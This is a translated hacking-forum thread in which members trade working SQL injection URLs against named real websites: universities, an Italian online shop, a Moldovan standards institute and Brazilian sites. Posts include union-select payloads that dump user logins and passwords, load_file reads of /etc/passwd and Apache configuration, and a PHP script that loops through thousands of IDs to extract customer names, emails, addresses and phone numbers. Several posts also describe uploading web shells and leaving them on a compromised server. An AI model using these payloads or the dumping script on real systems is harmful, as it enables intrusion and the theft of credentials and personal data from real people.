SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SVAROG

    SVAROG Elder

    5.0.45-log
     
  2. USAkid

    USAkid Elder

    And then what?

    Code:
    http://www.remhq.com/news_story.php?id=-894'+union+select+1,concat_ws(username,0x3a,password,0x3a,accesslevel),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+hero_users+limit+0,1/*
     
  3. Iceangel_

    Iceangel_ Elder

    exclusively .edu

    Lake Superior State University
    Code:
    http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+29,1/*
    PR=7
    5.0.20
    -------------------------------------------------------------------

    National Center for Supercomputing Applications at the University of Illinois (how about that!)
    Code:
    http://www.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1000+union+select+1,version(),3,4,5,6,7,8,9,10/*
    PR=7
    5.0.45-log 3
    paths:
    Code:
    /afs/ncsa.uiuc.edu/web/www-2006/site/htdocs/AboutUs/People/mailto_func.php
    -------------------------------------------------------------------

    University of Pennsylvania
    Code:
    http://asam.sas.upenn.edu/detail.php?id=-861+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11--
    PR=7
    4.1.15-standard
    paths:
    Code:
    /var/www/ASAM/detail.php 
     
  4. MaSTeR GэN

    MaSTeR GэN Member

    prontospesa.it
    a mid-sized online shop
    Code:
    http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646
    
    tables:
    Code:
    DM-Reward
    DM-Target-Campagna
    DM-Campagne
    ReachKeyGenerale
    dtproperties
    Acquisti
    Acquisto
    CAP
    Carrelli
    Carrello
    Commessi
    Config
    CostiConsegna
    CRM
    ECommerce
    ECommerce1
    ECommerce3
    IVA
    ListaPersonale
    MailAccount
    Offerta
    Offerte
    Operatori
    ReachKey
    Risultati
    SenzaEAN
    Supermarket
    SuperMarket_Cat
    Supermarket0
    sysconstraints
    syssegments
    ToDo
    Utenti
    Utenti_OnLine
    
    whoever isn't lazy might find something in there ;) Personally I'm too lazy :)
    Pulling from the Utenti table: email + pass + assorted junk like addresses:
    Code:
    http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=1)--
    
    PHP script for dumping the Utenti table
    PHP:
    <?php
    set_time_limit(0);
    // Fetch a URL with cURL and return the response body as a string
    function send_get($get_url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $get_url);
        curl_setopt($ch, CURLOPT_COOKIEFILE, "./htdocs/1.txt");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
    $postfix = 0;
    $filename = "base".$postfix.".txt";
    $desp = fopen($filename, "a+");
    // Walk IdUtente values and append one extracted row per response to the output file
    for ($id = 0; $id < 30000; $id++) {
        $get_url = "http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=".$id.")--";
        $str = send_get($get_url);
        // The quoted value inside the Italian conversion-error message is the row we want
        if (preg_match("/nvarchar\040'(.*)'\040in\040una\040colonna/", $str, $matches)) {
            echo $matches[1];
            fputs($desp, $matches[1]);
            fputs($desp, "\n");
        }
    }
    fclose($desp);
    ?>
    Here's what we get as output:
     
  5. R1dex

    R1dex Elder

    http://shariki.com/news/?id=-1{SQLINJ}

    Database Version: 5.0.67-log
    Database name: u58240
    User name: [email protected]
     
  6. Fugitif

    Fugitif Elder

    Code:
    http://www.adultfyi.com/read.php?ID=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    Code:
    http://www.yesilyurtlar.com.tr/en/urun.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
     
  7. N1K70

    N1K70 Banned

    Code:
    http://www.webhoster4u.de/server.php?id=-132+union+all+select+database(),version()--
    4.1.22-standard ;)
     
  8. =HALK=

    =HALK= Member

    Pr4
    Code:
    http://www.thenaturenetwork.net/news/news.php?news_id=-1+union+select+1,2,3,4,5,concat_ws(0xb,version(),user(),database()),7,8,9,10,11,12,13,14,15,16--
    
    here are the tables with columns:
    http://tables-columns.narod.ru/thenaturenetwork.net.txt
     
  9. cash$$$

    cash$$$ Banned

    http://www.icehw.net/article.php?id=...,13,14,15,16--

    version: 5.0.22-Debian_0ubuntu6.06.3-log
    user: icehw@localhost
    database: icehw_main

    table: login
    Concat_ws(0x3a,ID,username,PASSWORD)

    http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,name,pass),7,8,9+from+adbm_user--


    http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1--
     
  10. lastsmile

    lastsmile Elder

    НОВЫЕ ТЕХНОЛОГИИ ЗАЩИТЫ ИНФОРМАЦИИ-7000
    Yandex TIC 240
    Google Page Rank 5


    Code:
    http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+version(),2,3,4
    
    version() 5.0.51a
    user() w7000@localhost
    database() w7000

    Code:
    7000_news
    1.	id
    2.	news_text
    3.	news_date
    4.	mode1
    5.	mode2
    6.	news_link
    7.	news_title
    7000_stuff_messages 
    1.	id
    2.	section
    3.	date
    4.	login
    5.	parent
    6.	topic
    7.	message
    8.	made
    9.	city
    10.	type
    11.	quality
    12.	price
    13.	seen
    7000_stuff_sections 
    1.	id
    2.	title
    7000_stuff_users 
    1.	id
    2.	login
    3.	password
    4.	email
    5.	address
    6.	occupation
    7.	homepage
    8.	interests
    9.	icq
    10.	sendnews
    @x0Elvarc 
    1.	id
    2.	title
    TCat 
    1.	id
    2.	title
    3.	id_cat
    4.	pos
    banner_buys 
    1.	id
    2.	bid
    3.	sid
    4.	uid
    5.	ip
    6.	crt
    7.	extra
    banner_click 
    1.	id
    2.	bid
    3.	ip
    4.	crt
    5.	sid
    6.	zoneid
    banner_content 
    1.	id
    2.	path
    3.	btype
    4.	header
    5.	crt
    6.	url
    banner_main 
    1.	id
    2.	zoneid
    3.	crt
    4.	shows
    5.	bansrc
    6.	on_off
    7.	frequency
    banner_sessions 
    1.	id
    2.	sid
    3.	ip
    4.	crt
    banner_sites 
    1.	id
    2.	description
    3.	url
    banner_source 
    1.	id
    2.	sizev
    3.	sizeh
    4.	type
    banner_user 
    1.	id
    2.	bid
    3.	crt
    4.	uid
    5.	bansid
    6.	shows
    banner_zones 
    1.	id
    2.	siteid
    3.	width
    4.	on_off
    5.	description
    banscanusers 
    1.	id
    2.	name
    3.	mail
    4.	www
    5.	phone
    6.	ip
    7.	login
    8.	pass
    cat 
    1.	id
    2.	name
    3.	text
    4.	rz
    5.	vis
    6.	konfig
    7.	pos
    8.	ismain
    9.	textmain
    10.	photomain
    catalog 
    1.	id
    2.	parent_id
    3.	is_section
    4.	title
    5.	price
    categbd 
    1.	number
    2.	cat
    categbd1 
    1.	nomer
    2.	name
    3.	subcat
    4.	dateadd
    5.	lang
    6.	homepage
    7.	ratadm
    8.	ratusr
    9.	download
    10.	url
    11.	description
    
    can't be bothered to look for anything further....
     
  11. USAkid

    USAkid Elder

    What else is there to dig for?

    Here come the users:
    Code:
    http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+concat_ws(login,0x3a,password),2,3,4+from+7000_stuff_users+limit+01--
    Passwords in plaintext :)
     
  12. Iceangel_

    Iceangel_ Elder

    continuing the .edu injections...

    no idea what this is...
    Code:
    http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1047+union+select+1,2,3,4,version(),6,7,8,9/*
    4.1.12-log
    PR=0
    ----------------------------------------------------------------

    Institute for NanoBioTechnology
    Code:
    http://inbt.jhu.edu/facultyexpertise.php?id=personalresult&usr=-45+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
    4.1.22-standard
    PR=5
    ----------------------------------------------------------------

    Portland State University
    Code:
    http://web.pdx.edu/~salp/salp_saga/calendar.php?action=view&id=-1143+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--
    5.0.37
    PR=4
    ----------------------------------------------------------------

    no idea what this is, and it's a blind injection too...
    Code:
    http://cils.exploratorium.edu/cils/page.php?ID=148+union+select+1,2,3,4--
    PR=6
     
  13. Ponchik

    Ponchik Baked goods

    standard.md
    damn, the national institute of standardization and all that, and it's full of holes; where is the Moldovan net heading =\
    The output is unclear anyway
    http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()/*
    Unclear which version... But
    http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()+FROM+information_schema.tables/*
    It works, so it's 5; whoever needs it will figure out the output :)
     
  14. -=megahertz=-

    -=megahertz=- Elder

    Ponchik, you didn't even work out the number of columns... and you say the output is unclear
     
  15. Spyder

    Spyder Elder

    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+version()/*
    the output is in the title, sort of
    Ponchik, you forgot to put a quote there

    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+concat(username,':',password)+from+users/*

    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/etc/passwd')+from+users/*
    Since it's FreeBSD, load_file can be used to read directories; we find httpd.conf
    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/local/etc/apache2/httpd.conf')+from+users/*
    Look at the source, find the line
    DocumentRoot "/usr/home/insm/www"
    read that directory
    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/home/insm/www')+from+users/*
    Digging now; seems you can't upload a file to the web root
    PS found it, the public folder is writable))
    I won't post a link to the shell; those who know how will upload one =)

    Safe mode: OFF
    Disable functions: 0
    OS: FreeBSD gw.standard.md 5.2.1-RELEASE-p11 FreeBSD 5.2.1-RELEASE-p11 #0: Fri Oct 15 09:17:15 EEST 2004 [email protected]:/usr/obj/usr/src/sys/standard.v0 i386

    PPS by the way, allow_url_fopen = On there and .htaccess blocks access to php files; solved by uploading a phtml
     
    #6715 Spyder, 2 Nov 2008
    Last edited: 3 Nov 2008
  16. Cennarios

    Cennarios Elder

    http://www.sticma.com.br/cursos_ver.php?id=-1+union+select+1,2,concat_ws(0x3a3a,nome,Senha,email),4,5,6,7,8,9,10,11+from+usuario+limit+0,1

    Admin panel: http://www.sticma.com.br/admin

    Microsoft-IIS/6.0. PHP/5.2.5
    Windows NT WINDOWS 5.2 build 3790
    NOT SECURE

    Permissions are set fairly sensibly. It won't go above the root of the specific host.

    It's possible to upload a shell.
    ---------------------------------------------------------------

    P.S. The studio that built this site suffers from sql-inj itself.
    http://www.fonteweb.com.br/solucoes.php?id=-1+union+select+1,concat_ws(0x3a3a,nome,Senha,email),3,4,5,6,7+from+usuario+limit+0,1
    The hash didn't crack. And I didn't dig further.
    But apparently all their projects are shoddy...
     
  17. Fuckel

    Fuckel Banned

    thanks, had a laugh
    http://www.standard.md/fusion_cr/filemanager/index.php
    by and large, uploading a script is feasible :)))
    ps clean up after yourselves
    http://www.standard.md/public/2.txt
    http://www.standard.md/public/spyder.php
    http://www.standard.md/public/spyder.phtml
     
    #6717 Fuckel, 3 Nov 2008
    Last edited: 3 Nov 2008
  18. Twoster

    Twoster Members of Antichat

    ::::::::::::::::::::America::::::::::::::::::::::::::

    ::::::::::::::::::::Moldova::::::::::::::::::::::::::
    The password field is present, but for some reason it isn't output...


    ::::::::::::::::::::name::::::::::::::::::::::::::
    ::::::::::::::::::::ru::::::::::::::::::::::::::
    http://www.2kaudit.ru/login.php
    The login seems to be here, but none of the passwords worked!

     
  19. xPriZrAkx

    xPriZrAkx Member

    5.0.32-Debian_7etch6-log

    847 tables


    -------------------------------------------------------------------------------------------------------------------------------------------

    5.0.51b 4

    57 tables

    -------------------------------------------------------------------------------------------------------------------------------------------

    5.0.27-standard

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.22

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.20

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.20-max-log

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.0.17
     
    #6719 xPriZrAkx, 3 Nov 2008
    Last edited: 3 Nov 2008
  20. Spyder

    Spyder Elder

    Fuckel, what did you laugh at? at the fact that you can only upload a shell through the file manager?))) Let's laugh at that together)

    ps clean up after yourselves

    Why the hell should I delete my shell? :D
    Damn, hackers are breeding like crazy; they find a file manager and start showing off
     